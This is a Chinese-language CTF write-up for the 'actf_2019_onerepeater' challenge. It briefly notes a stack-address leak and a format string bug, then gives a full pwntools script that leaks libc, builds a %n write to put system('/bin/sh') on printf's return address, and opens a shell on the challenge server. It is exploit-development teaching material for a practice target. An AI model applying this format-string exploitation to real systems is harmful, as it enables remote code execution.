actf_2019_onerepeater

<p>[TOC]</p> <h1>分析</h1> <p>程序主要两个操作</p> <p><img src="https://pic.imgdb.cn/item/63a6d5c808b683016366d194.png" alt="" />  </p> <p>读取，但没有溢出，泄露了栈地址</p> <p><img src="https://pic.imgdb.cn/item/63a6d60508b683016367252f.png" alt="" />  </p> <p>格式化字符串漏洞，那么思路很清晰，先泄露libc地址计算one_gadget，然后写入函数返回的地址实现getshell，我这里采用system(”/bin/sh“)</p> <h1>Exploit</h1> <pre><code>from pwn import* # context.log_level = 'debug' # o = process("./pwn") o =remote("node4.buuoj.cn", 25919) o.sendlineafter("3) Exit\n", '1') buf = int(o.recv(8), 16) log.info("buf: %x\n", buf) o.sendline("%2$p") o.sendlineafter("3) Exit\n", '2') puts_addr = int(o.recvline()[:-1], 16) - 11 log.info("puts_addr: %x\n", puts_addr) libc_base = puts_addr - 0x67360 log.info("libc_base: %x\n", libc_base) system = libc_base + 0x3cd10 bin_sh = libc_base + 0x17b8cf printf_ret = buf - (0xffffcb40 - 0xffffcb1c) printf_arg = printf_ret + 8 addr1 = int(hex(system)[-4:], 16) addr2 = int(hex(system)[-8:-4], 16) addr3 = int(hex(bin_sh)[-4:], 16) addr4 = int(hex(bin_sh)[-8:-4], 16) addr = [addr1, addr2, addr3, addr4] addr.sort() log.info("addr1: %x addr2: %x addr3: %x addr4: %x\n", addr1, addr2, addr3, addr4) payload = p32(printf_ret) + p32(printf_ret+2) + p32(printf_arg) + p32(printf_arg+2) dic = {addr1:"%16$n", addr2:"%17$n", addr3:"%18$n", addr4:"%19$n"} payload += "%{}p".format(addr[0] - 16) + dic[addr[0]] payload += "%{}p".format(addr[1] - addr[0]) + dic[addr[1]] payload += "%{}p".format(addr[2] - addr[1]) + dic[addr[2]] payload += "%{}p".format(addr[3] - addr[2]) + dic[addr[3]] log.info("payload: %s\n", payload) o.recv() o.sendline('1') o.recv() o.sendline(payload) o.interactive() </code></pre> <p><img src="https://pic.imgdb.cn/item/63a6ff1408b6830163ab1c3e.png" alt="" /></p>